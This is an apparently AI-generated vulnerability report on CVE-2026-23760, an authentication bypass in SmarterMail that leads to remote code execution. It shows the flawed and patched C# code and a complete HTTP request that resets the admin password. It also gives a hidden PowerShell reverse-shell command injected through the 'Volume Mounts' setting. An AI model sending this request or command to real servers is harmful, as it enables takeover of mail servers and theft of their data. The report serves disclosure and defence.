CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-23760

SmarterMail, Dumber Auth: The CVE-2026-23760 Deep Dive

Alon Barad
Alon Barad
Software Engineer

Jan 28, 2026·5 min read·38 visits

Executive Summary (TL;DR)

If you run SmarterMail (versions < Build 9511), anyone can become your system administrator by sending a single JSON packet. Once they are admin, they can execute OS commands via the 'Volume Mounts' feature. It's a 9.8/10 on the panic scale.

A critical authentication bypass in SmarterTools SmarterMail allows unauthenticated attackers to reset the administrator password by simply telling the API they are an administrator. This leads to immediate remote code execution via built-in management features.

The Target: An Exchange Alternative

SmarterMail by SmarterTools is one of those ubiquitous pieces of software that quietly powers the internet's underbelly. It's an Exchange alternative for Windows and Linux, popular among MSPs and mid-sized businesses who look at Microsoft's licensing fees and say, "No thanks."

Because it handles email, it sits on the perimeter, usually exposing ports 80, 443, and its management interface (default 9998) to the entire world. It holds the keys to the kingdom: password resets, confidential communications, and 2FA tokens.

In January 2026, researchers found that this digital fortress had left the back door not just unlocked, but wide open with a neon sign pointing to it. CVE-2026-23760 isn't a complex memory corruption bug; it's a logic flaw so fundamental it hurts.

The Flaw: Trusting the Client

The vulnerability resides in the force-reset-password API endpoint. Ideally, a password reset function should require one of two things: the old password (to prove you are who you say you are) or a secure token (to prove you have access to the recovery email).

SmarterMail implemented these checks for normal users. However, for system administrators, the developers took a shortcut. The API accepts a JSON payload containing a boolean flag called IsSysAdmin.

Here is the logic flaw in plain English: If the request says IsSysAdmin: true, the code assumes the caller is authorized to perform the reset. It skips the "Old Password" check entirely. It's the digital equivalent of walking into a bank vault while wearing a t-shirt that says "I work here," and the security guards just waving you through.

The Code: The Smoking Gun

Let's look at the decompiled C# code from the AuthenticationController. This is where the magic happens—or rather, where the tragedy unfolds.

The Vulnerable Code (Pre-Build 9511):

public new ResetPasswordResult ForcePasswordReset(ForceResetPasswordInputs inputs, string hostname)
{
    // ... setup code ...
 
    // CRITICAL FLAW: Trusting user input blindly
    if (inputs.IsSysAdmin)
    {
        // Retrieve the admin account by username (provided by attacker)
        var admin = SystemRepository.Instance.AdministratorGetByUsername(inputs.Username);
        
        // Create an update object with the NEW password (provided by attacker)
        var item = new db_system_administrator
        {
            guid = admin.guid,
            Password = inputs.NewPassword,
            password_history_hashed = dictionary
        };
 
        // Commit to database without verifying OldPassword or Token!
        SystemRepository.Instance.AdministratorUpdate(item, ...);
    }
    // ...
}

See that empty space before AdministratorUpdate? That's where the security check should be. The code implicitly trusts that if you claim to be doing a SysAdmin reset, you must know what you're doing.

The Fix (Build 9511):

The patch is a single if statement that validates the OldPassword even for admins.

if (inputs.IsSysAdmin)
{
    // THE FIX: Validate the existing credentials first
    if (!db_system_administrator_readonly.ValidatePassword(inputs.OldPassword, null)) 
    {
        return new ResetPasswordResult 
        {
            Success = false, 
            Message = "Invalid input parameters"
        };
    }
    // ... proceed to update ...
}

The Exploit: From Zero to SYSTEM

Exploiting this is trivially easy. You don't need shellcode, you don't need heap spraying. You just need curl.

Step 1: The Takeover

Send a POST request to the API. We set IsSysAdmin to true and provide the default administrator username (admin). We can put garbage in OldPassword because the server ignores it.

POST /api/v1/auth/force-reset-password HTTP/1.1
Host: target-mail-server:9998
Content-Type: application/json
 
{
  "IsSysAdmin": "true",
  "OldPassword": "ignored_garbage",
  "Username": "admin",
  "NewPassword": "Hacked!123",
  "ConfirmPassword": "Hacked!123"
}

If successful, the server responds with 200 OK and a debug string containing check8.2. Congratulations, you are now the admin.

Step 2: The Execution (RCE)

SmarterMail has a feature called "Volume Mounts" that allows admins to map drives. Historically, mail server admins often need to execute scripts. SmarterMail allows this via the interface.

An attacker simply logs in with the new password, navigates to Settings -> Volume Mounts, and configures a new mount point. In the command field, they inject an OS command:

cmd.exe /c powershell -nop -w hidden -e <base64_reverse_shell>

Upon saving, the service executes this command as NT AUTHORITY\SYSTEM on Windows or root on Linux. Game over.

The Impact

The impact here cannot be overstated. We are talking about unauthenticated Remote Code Execution (RCE) on an email server.

  1. Data Exfiltration: The attacker can read every email sent or received by the organization. Corporate espionage gold.
  2. Pivot Point: Mail servers are often trusted by other internal systems. This is the perfect beachhead for lateral movement into the domain controller.
  3. Ransomware: It is already confirmed that ransomware groups are using this CVE to encrypt mail stores.

CISA added this to their KEV catalog just days after the exploit went public. If you see this open on the internet, it is likely already compromised.

Official Patches

SmarterToolsSmarterMail Release Notes Build 9511

Technical Appendix

CVSS Score
9.8/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Probability
51.37%
Top 2% most exploited
2,300
via Shodan

Affected Systems

SmarterMail Enterprise (Windows)SmarterMail Professional (Windows)SmarterMail Free (Windows)

Affected Versions Detail

Product
Affected Versions
Fixed Version
SmarterMail
SmarterTools
< Build 9511Build 9511
AttributeDetail
CWECWE-288 (Auth Bypass)
CVSS v3.19.8 (Critical)
Attack VectorNetwork (API)
Privileges RequiredNone
User InteractionNone
Exploit StatusHigh (Active Exploitation)
EPSS Score0.51 (97th Percentile)

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1078Valid Accounts
Persistence
T1059Command and Scripting Interpreter
Execution
CWE-288
Authentication Bypass

Authentication Bypass Using an Alternate Path or Channel

Known Exploits & Detection

watchTowrFull exploit chain for Auth Bypass and RCE
NucleiDetection Template Available

Vulnerability Timeline

Vulnerability discovered by watchTowr
2026-01-08
SmarterTools releases Build 9511 patch
2026-01-15
Active exploitation detected in the wild
2026-01-17
Public disclosure and PoC release
2026-01-22
Added to CISA KEV Catalog
2026-01-26

References & Sources

  • [1]Technical Analysis by watchTowr
  • [2]CISA KEV Catalog

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•13 minutes ago•GHSA-365W-HQF6-VXFG
9.8

GHSA-365w-hqf6-vxfg: Multiple Critical Vulnerabilities in Crawl4AI Docker API Server

The Crawl4AI Docker API server, in versions 0.8.6 and prior, contains multiple critical vulnerabilities including improper path sanitization, missing authentication on administration routes, hardcoded JWT secrets, and SSRF. These vulnerabilities allow remote, unauthenticated attackers to write arbitrary files, execute arbitrary code, and pivot into private cloud environments.

Amit Schendel
Amit Schendel
0 views•7 min read
•about 3 hours ago•GHSA-534H-C3CW-V3H9
5.5

GHSA-534h-c3cw-v3h9: Local Information Disclosure via Abstract-Namespace Socket in Nuxt Dev Server

A local security vulnerability in the Nuxt development server (nuxt dev) allows local unprivileged users to access sensitive configuration files and source code. On Linux environments running Node.js 20+, Nuxt bound its internal vite-node IPC server to an abstract-namespace Unix socket without any peer authentication, enabling co-resident local users to connect and request module code directly.

Amit Schendel
Amit Schendel
4 views•5 min read
•about 4 hours ago•GHSA-8RFP-98V4-MMR6
0.0

GHSA-8RFP-98V4-MMR6: Protocol-Filtering Bypass via Unicode Obfuscation in Mozilla Bleach

Mozilla Bleach is an open-source HTML sanitizing library for Python. Versions up to and including 6.3.0 contain an incomplete filtering implementation in the URI validation logic ('sanitize_uri_value'). This logic fails to detect disallowed protocols, such as 'javascript:', if they contain Unicode invisible characters, whitespace characters, or characters with a code point greater than U+00A0. While standard-compliant web browsers do not directly execute invalid URI schemes containing these non-standard characters, downstream systems that normalize Unicode text by stripping invisible or non-ASCII characters can unintentionally reactivate the 'javascript:' prefix, causing Cross-Site Scripting (XSS). Additionally, this behavior violates Bleach's core sanitization contract by outputting URIs that bypass protocol allowlists configured by the caller.

Amit Schendel
Amit Schendel
4 views•7 min read
•about 4 hours ago•GHSA-G75F-G53V-794X
4.3

GHSA-G75F-G53V-794X: CPU Exhaustion via Unbounded Email Regular Expression Scanning in Bleach

An uncontrolled resource consumption vulnerability exists in the Python package Bleach when parsing text to linkify email addresses. When `parse_email=True` is enabled, the regular expression engine is forced into a quadratic-time complexity scan on specially crafted payloads lacking an '@' symbol. This causes immediate CPU exhaustion and blocks application server worker processes.

Amit Schendel
Amit Schendel
4 views•6 min read
•about 5 hours ago•GHSA-GR75-JV2W-4656
4.7

GHSA-GR75-JV2W-4656: Path Traversal and Sandbox Escape in LangChain File-Search Middleware and Loaders

A path traversal and sandbox escape vulnerability in LangChain and LangChain-Anthropic Python packages allows unauthenticated local attackers to access files outside the restricted directory via crafted input, symbolic links, or prefix bypasses.

Alon Barad
Alon Barad
3 views•8 min read
•about 5 hours ago•GHSA-M557-WRGG-6RP4
5.8

GHSA-m557-wrgg-6rp4: Server-Side Request Forgery via Authority Information Access (AIA) Chasing in phpseclib

The PHP Secure Communications Library (phpseclib) contains a Server-Side Request Forgery (SSRF) vulnerability due to an insecure default implementation of Authority Information Access (AIA) certificate chasing. This flaw allows remote, unauthenticated attackers to coerce applications validating user-supplied X.509 certificates into generating arbitrary outbound HTTP requests to internal networks or local interfaces.

Amit Schendel
Amit Schendel
4 views•6 min read